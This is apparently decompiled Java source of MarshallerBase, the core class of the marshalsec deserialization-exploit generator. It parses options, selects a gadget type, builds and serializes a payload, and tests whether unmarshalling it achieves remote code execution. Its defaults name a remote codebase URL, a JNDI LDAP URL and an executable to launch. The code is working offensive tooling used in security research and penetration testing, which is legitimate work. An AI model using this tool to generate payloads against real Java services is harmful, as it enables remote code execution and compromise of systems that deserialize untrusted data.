package marshalsec;

import java.io.IOException;
import java.lang.reflect.Method;
import java.util.Arrays;
import java.util.LinkedList;
import marshalsec.gadgets.Args;
import marshalsec.gadgets.GadgetType;
import marshalsec.gadgets.Primary;
import marshalsec.gadgets.ToStringUtil;

/* loaded from: input_file:marshalsec/MarshallerBase.class */
public abstract class MarshallerBase<T> implements UtilFactory {
    public static final String defaultCodebase = "{exploit.codebase:http://localhost:8080/}";
    public static final String defaultCodebaseClass = "{exploit.codebaseClass:Exploit}";
    public static final String defaultJNDIUrl = "{exploit.jndiUrl:ldap://localhost:1389/obj}";
    public static final String defaultExecutable = "{exploit.exec:/usr/bin/gedit}";

    public abstract T marshal(Object obj) throws Exception;

    public abstract Object unmarshal(T t) throws Exception;

    @Override // marshalsec.UtilFactory
    public Object makeToStringTriggerUnstable(Object obj) throws Exception {
        return ToStringUtil.makeSpringAOPToStringTrigger(obj);
    }

    /* JADX INFO: Access modifiers changed from: protected */
    public void run(String[] strArr) {
        try {
            boolean z = false;
            boolean z2 = false;
            boolean z3 = false;
            EscapeType escapeType = EscapeType.NONE;
            int i = 0;
            GadgetType gadgetType = null;
            while (i < strArr.length && strArr[i].charAt(0) == '-') {
                if (strArr[i].equals("-t")) {
                    z = true;
                    i++;
                } else if (strArr[i].equals("-a")) {
                    z2 = true;
                    i++;
                } else if (strArr[i].equals("-e")) {
                    int i2 = i + 1;
                    escapeType = EscapeType.valueOf(strArr[i2]);
                    i = i2 + 1;
                } else if (strArr[i].equals("-v")) {
                    z3 = true;
                    i++;
                } else {
                    i++;
                }
            }
            if (!z2) {
                try {
                    if (strArr.length > i) {
                        gadgetType = GadgetType.valueOf(strArr[i].trim());
                        i++;
                    }
                } catch (IllegalArgumentException e) {
                    System.err.println("Unsupported gadget type " + strArr[i]);
                    System.exit(-1);
                }
            }
            if (!z2 && gadgetType == null) {
                System.err.println("No gadget type specified, available are " + Arrays.toString(getSupportedTypes()));
                System.exit(-1);
            }
            if (z2) {
                runAll(z, z3, false, escapeType);
            } else {
                String[] strArr2 = new String[strArr.length - i];
                System.arraycopy(strArr, i, strArr2, 0, strArr.length - i);
                doRun(gadgetType, z, z3, false, escapeType, strArr2);
            }
        } catch (Exception e2) {
            e2.printStackTrace(System.err);
        }
    }

    public void runTests() throws Exception {
        runAll(true, false, true, EscapeType.NONE);
    }

    private void runAll(boolean z, boolean z2, boolean z3, EscapeType escapeType) throws Exception {
        for (GadgetType gadgetType : getSupportedTypes()) {
            Args args = (Args) getTargetMethod(gadgetType).getAnnotation(Args.class);
            if (args == null) {
                throw new Exception("Missing Args in " + gadgetType);
            }
            if (!args.noTest()) {
                doRun(gadgetType, z, z2, z3, escapeType, args.defaultArgs());
            }
        }
    }

    /* JADX WARN: Multi-variable type inference failed */
    private void doRun(GadgetType gadgetType, boolean z, boolean z2, boolean z3, EscapeType escapeType, String[] strArr) throws Exception, IOException {
        try {
            System.setSecurityManager(new SideEffectSecurityManager());
            Object createObject = createObject(gadgetType, expandArguments(strArr));
            T marshal = ((createObject instanceof byte[]) || (createObject instanceof String)) ? createObject : marshal(createObject);
            if (!z || z2) {
                System.err.println();
                writeOutput(marshal, escapeType);
            }
            if (z) {
                System.err.println();
                System.err.println("Running gadget " + gadgetType + ":");
                test(marshal, z3);
            }
        } finally {
            System.setSecurityManager(null);
        }
    }

    private static String[] expandArguments(String[] strArr) {
        String[] strArr2 = new String[strArr.length];
        for (int i = 0; i < strArr.length; i++) {
            strArr2[i] = expandArgument(strArr[i]);
        }
        return strArr2;
    }

    private static String expandArgument(String str) {
        String substring;
        if (str.charAt(0) != '{' || str.charAt(str.length() - 1) != '}') {
            return str;
        }
        int indexOf = str.indexOf(58, 1);
        String str2 = null;
        if (indexOf >= 0) {
            substring = str.substring(1, indexOf);
            str2 = str.substring(indexOf + 1, str.length() - 1);
        } else {
            substring = str.substring(1, str.length() - 1);
        }
        return System.getProperty(substring, str2);
    }

    protected void test(T t, boolean z) throws Exception {
        Throwable th = null;
        TestingSecurityManager testingSecurityManager = new TestingSecurityManager();
        try {
            try {
                System.setSecurityManager(testingSecurityManager);
                unmarshal(t);
                System.setSecurityManager(null);
            } catch (Exception e) {
                th = extractInnermost(e);
                System.setSecurityManager(null);
            }
            try {
                testingSecurityManager.assertRCE();
            } catch (Exception e2) {
                System.err.println("Failed to achieve RCE:" + e2.getMessage());
                if (th != null) {
                    th.printStackTrace(System.err);
                }
                if (z) {
                    if (!(th instanceof Exception)) {
                        throw e2;
                    }
                    throw ((Exception) th);
                }
            }
        } catch (Throwable th2) {
            System.setSecurityManager(null);
            throw th2;
        }
    }

    private static Throwable extractInnermost(Throwable th) {
        return (th.getCause() == null || th.getCause() == th) ? th : extractInnermost(th.getCause());
    }

    /* JADX WARN: Multi-variable type inference failed */
    private void writeOutput(T t, EscapeType escapeType) throws IOException {
        if (t instanceof byte[]) {
            System.out.write((byte[]) t);
        } else {
            if (!(t instanceof String)) {
                throw new UnsupportedOperationException();
            }
            switch (escapeType) {
                case JAVA:
                    System.out.println(escapeJavaString((String) t));
                    return;
                default:
                    System.out.println((String) t);
                    return;
            }
        }
    }

    private static String escapeJavaString(String str) {
        return str.replaceAll("([\"\\\\])", "\\\\$1");
    }

    protected Object createObject(GadgetType gadgetType, String[] strArr) throws Exception {
        Method targetMethod = getTargetMethod(gadgetType);
        if (!gadgetType.getClazz().isAssignableFrom(getClass())) {
            throw new Exception("Gadget not supported for this marshaller");
        }
        Args args = (Args) targetMethod.getAnnotation(Args.class);
        if (args == null || strArr.length >= args.minArgs()) {
            return targetMethod.invoke(this, this, strArr);
        }
        Object[] objArr = new Object[3];
        objArr[0] = gadgetType;
        objArr[1] = Integer.valueOf(args.minArgs());
        objArr[2] = args.args() != null ? Arrays.toString(args.args()) : "";
        throw new Exception(String.format("Gadget %s requires %d arguments: %s", objArr));
    }

    public GadgetType[] getSupportedTypes() {
        LinkedList linkedList = new LinkedList();
        for (GadgetType gadgetType : GadgetType.values()) {
            if (gadgetType.getClazz().isAssignableFrom(getClass())) {
                linkedList.add(gadgetType);
            }
        }
        return (GadgetType[]) linkedList.toArray(new GadgetType[linkedList.size()]);
    }

    public Method getTargetMethod(GadgetType gadgetType) throws Exception {
        Method[] methods = gadgetType.getClazz().getMethods();
        Method method = null;
        if (methods.length != 1) {
            int length = methods.length;
            int i = 0;
            while (true) {
                if (i >= length) {
                    break;
                }
                Method method2 = methods[i];
                if (method2.getAnnotation(Primary.class) != null) {
                    method = method2;
                    break;
                }
                i++;
            }
            if (method == null) {
                throw new Exception("Gadget interface contains no or multiple methods");
            }
        } else {
            method = methods[0];
        }
        return getClass().getMethod(method.getName(), method.getParameterTypes());
    }
}
